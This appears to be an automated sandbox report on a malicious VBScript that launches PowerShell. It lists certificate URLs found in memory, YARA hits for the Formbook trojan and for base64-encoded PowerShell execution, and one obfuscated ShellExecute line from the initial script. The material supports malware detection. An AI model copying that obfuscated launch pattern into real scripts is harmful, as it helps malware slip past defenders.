        Source: wscript.exe, 00000000.00000003.2012535888.000001B66AF52000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012887665.000001B66AF2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012887665.000001B66AF52000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012243856.000001B66AF18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
        Source: powershell.exe, 00000002.00000002.2624324723.000001CB00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2474889182.0000000004DB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: wscript.exe, 00000000.00000003.2014996011.000001B66CD76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
        Source: wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
        Source: wscript.exe, 00000000.00000003.2012535888.000001B66AF52000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2050078693.000001B66AF08000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2049565069.000001B66AECD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2050934752.000001B66AF08000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012887665.000001B66AF2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012887665.000001B66AF52000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012243856.000001B66AF18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
        Source: wscript.exe, 00000000.00000003.2012535888.000001B66AF52000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2050078693.000001B66AF08000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2049565069.000001B66AECD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2050934752.000001B66AF08000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012887665.000001B66AF2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012887665.000001B66AF52000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012243856.000001B66AF18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
        Source: wscript.exe, 00000000.00000003.2012535888.000001B66AF52000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2050078693.000001B66AF08000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2049565069.000001B66AECD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2050934752.000001B66AF08000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012887665.000001B66AF2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012887665.000001B66AF52000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012243856.000001B66AF18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
        Source: wscript.exe, 00000000.00000003.2014920806.000001B66CDBA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014793443.000001B66CDAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014830264.000001B66CDBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.ncdc.gov.sa/crl/nrcacomb1.crl0
        Source: wscript.exe, 00000000.00000003.2014920806.000001B66CDBA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014793443.000001B66CDAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014830264.000001B66CDBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.ncdc.gov.sa/crl/nrcaparta1.crl
        Source: wscript.exe, 00000000.00000003.2014996011.000001B66CD76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.acabogacia.org/doc0
        Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.acabogacia.org0
        Source: wscript.exe, 00000000.00000003.2014812401.000001B66CDA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
        Source: wscript.exe, 00000000.00000003.2014812401.000001B66CDA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
        Source: wscript.exe, 00000000.00000003.2014812401.000001B66CDA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
        Source: wscript.exe, 00000000.00000003.2014812401.000001B66CDA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
        Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.agesic.gub.uy/acrn/acrn.crl0)
        Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.agesic.gub.uy/acrn/cps_acrn.pdf0
        Source: wscript.exe, 00000000.00000003.2014484947.000001B66CEC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ancert.com/cps0
        Source: wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es
        Source: wscript.exe, 00000000.00000003.2015404722.000001B66CD7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014996011.000001B66CD76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2016665644.000001B66CD7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es/AC/RC/ocsp0c
        Source: wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es/es/address-direccion.html
        Source: powershell.exe, 00000005.00000002.2474889182.0000000004F04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: wscript.exe, 00000000.00000003.2014996011.000001B66CD76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ca.posta.rs/dokumentacija0h
        Source: wscript.exe, 00000000.00000003.2015360503.000001B66AF82000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014886520.000001B66CD8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/0
        Source: wscript.exe, 00000000.00000003.2015316928.000001B66CD67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certeurope.fr/reference/pc-root2.pdf0
        Source: wscript.exe, 00000000.00000003.2015316928.000001B66CD67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certeurope.fr/reference/root2.crl0
        Source: wscript.exe, 00000000.00000003.2014942835.000001B66CD80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certicamara.com/dpc/0Z
        Source: wscript.exe, 00000000.00000003.2014743187.000001B66CDCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class1.crl0
        Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
        Source: wscript.exe, 00000000.00000003.2014996011.000001B66CD76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3.crl0
        Source: wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2016613844.000001B66CEBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
        Source: wscript.exe, 00000000.00000003.2015316928.000001B66CD67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
        Source: wscript.exe, 00000000.00000003.2014551191.000001B66CDEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014585557.000001B66CDF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.chambersign.org1
        Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.comsign.co.il/cps0
        Source: wscript.exe, 00000000.00000003.2015316928.000001B66CD67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.correo.com.uy/correocert/cps.pdf0
        Source: wscript.exe, 00000000.00000003.2015360503.000001B66AF8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014551191.000001B66CDEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2015014084.000001B66AF89000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014661712.000001B66CDF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-bt0
        Source: wscript.exe, 00000000.00000003.2014812401.000001B66CDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-int0
        Source: wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014484947.000001B66CEC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-std0
        Source: wscript.exe, 00000000.00000003.2014793443.000001B66CDAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.defence.gov.au/pki0
        Source: wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
        Source: wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.disig.sk/ca0f
        Source: wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dnie.es/dpc0
        Source: wscript.exe, 00000000.00000003.2014484947.000001B66CEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-me.lv/repository0
        Source: wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crl
        Source: wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
        Source: wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/SZSZ/0
        Source: wscript.exe, 00000000.00000003.2014484947.000001B66CEC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-trust.be/CPS/QNcerts
        Source: wscript.exe, 00000000.00000003.2025331654.000001B66CDC7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2026077213.000001B66CDC7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2049654599.000001B66CDC7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2051485295.000001B66CDC7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014743187.000001B66CDCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2025261904.000001B66CDC7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014759639.000001B66CDCE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2024942075.000001B66CDC7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2024611329.000001B66CDC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ecee.gov.pt/dpc0
        Source: wscript.exe, 00000000.00000003.2014942835.000001B66CD80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
        Source: wscript.exe, 00000000.00000003.2014942835.000001B66CD80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.eme.lv/repository0
        Source: wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
        Source: wscript.exe, 00000000.00000003.2014551191.000001B66CDEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014585557.000001B66CDF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.globaltrust.info0
        Source: wscript.exe, 00000000.00000003.2014551191.000001B66CDEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014585557.000001B66CDF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.globaltrust.info0=
        Source: wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
        Source: wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
        Source: wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oaticerts.com/repository.
        Source: wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09
        Source: wscript.exe, 00000000.00000003.2014942835.000001B66CD80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_21_1.pdf0:
        Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
        Source: wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.gva.es/cps0
        Source: wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.gva.es/cps0%
        Source: wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
        Source: wscript.exe, 00000000.00000003.2014484947.000001B66CEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
        Source: wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.postsignum.cz/crl/psrootqca2.crl02
        Source: wscript.exe, 00000000.00000003.2015360503.000001B66AF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
        Source: wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014638603.000001B66CEBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
        Source: wscript.exe, 00000000.00000003.2014812401.000001B66CDA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rcsc.lt/repository0
        Source: wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sk.ee/cps/0
        Source: wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sk.ee/juur/crl/0
        Source: wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ssc.lt/cps03
        Source: wscript.exe, 00000000.00000003.2014551191.000001B66CDEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2015014084.000001B66AF89000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014661712.000001B66CDF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.suscerte.gob.ve/dpc0
        Source: wscript.exe, 00000000.00000003.2014551191.000001B66CDEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2015014084.000001B66AF89000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014661712.000001B66CDF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.suscerte.gob.ve/lcr0#
        Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
        Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.uce.gub.uy/acrn/acrn.crl0
        Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
        Source: wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www2.postsignum.cz/crl/psrootqca2.crl01
        Source: powershell.exe, 00000002.00000002.2624324723.000001CB00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000005.00000002.2474889182.0000000004DB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBeq
        Source: powershell.exe, 00000005.00000002.2478265897.0000000005E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000005.00000002.2478265897.0000000005E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000005.00000002.2478265897.0000000005E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: wscript.exe, 00000000.00000003.2015404722.000001B66CD7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014996011.000001B66CD76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2016665644.000001B66CD7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crl.anf.es/AC/ANFServerCA.crl0
        Source: wscript.exe, 00000000.00000003.2012535888.000001B66AF52000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2050078693.000001B66AF08000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2049565069.000001B66AECD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2050934752.000001B66AF08000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012887665.000001B66AF2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012887665.000001B66AF52000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012243856.000001B66AF18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
        Source: wscript.exe, 00000000.00000003.2012535888.000001B66AF52000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2050078693.000001B66AF08000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2049565069.000001B66AECD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2050934752.000001B66AF08000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012887665.000001B66AF2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012887665.000001B66AF52000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012243856.000001B66AF18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
        Source: wscript.exe, 00000000.00000003.2012535888.000001B66AF52000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012887665.000001B66AF2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012887665.000001B66AF52000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012243856.000001B66AF18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
        Source: powershell.exe, 00000005.00000002.2474889182.0000000004F04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000002.00000002.2624324723.000001CB01389000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 00000002.00000002.2761711892.000001CB10070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2478265897.0000000005E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: wscript.exe, 00000000.00000003.2015360503.000001B66AF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
        Source: wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rca.e-szigno.hu/ocsp0-
        Source: wscript.exe, 00000000.00000003.2014484947.000001B66CEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://repository.luxtrust.lu0
        Source: wscript.exe, 00000000.00000003.2014551191.000001B66CDEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014661712.000001B66CDF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://repository.tsp.zetes.com0
        Source: wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.certicamara.com/marco-legal0Z
        Source: wscript.exe, 00000000.00000003.2015404722.000001B66CD7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014996011.000001B66CD76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2016665644.000001B66CD7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.anf.es/AC/ACTAS/789230
        Source: wscript.exe, 00000000.00000003.2015404722.000001B66CD7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014996011.000001B66CD76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2016665644.000001B66CD7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.anf.es/AC/ANFServerCA.crl0
        Source: wscript.exe, 00000000.00000003.2015404722.000001B66CD7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014996011.000001B66CD76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2016665644.000001B66CD7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.anf.es/address/)1(0&
        Source: wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel
        Source: wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
        Source: wscript.exe, 00000000.00000003.2014484947.000001B66CEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.netlock.hu/docs/
        Source: wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.netlock.net/docs
        Source: wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m

        E-Banking Fraud

        barindex
        Source: Yara matchFile source: 0000000A.00000002.3310155904.0000000001100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.3309988573.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2821245767.0000000025220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.3309595807.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2802296347.0000000002E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.3309922219.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Source: amsi64_4268.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: amsi32_5328.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: 0000000A.00000002.3310155904.0000000001100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000B.00000002.3309988573.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000008.00000002.2821245767.0000000025220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000B.00000002.3309595807.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000008.00000002.2802296347.0000000002E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000B.00000002.3309922219.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: Process Memory Space: powershell.exe PID: 4268, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 5328, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Initial file: Call Patria.ShellExecute("P" & Bankbekendtgrelsen & ".e" + "xe", Minutterne, "", "", Nonadverbially)
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2992
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 2992
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2992Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 2992Jump to behavior
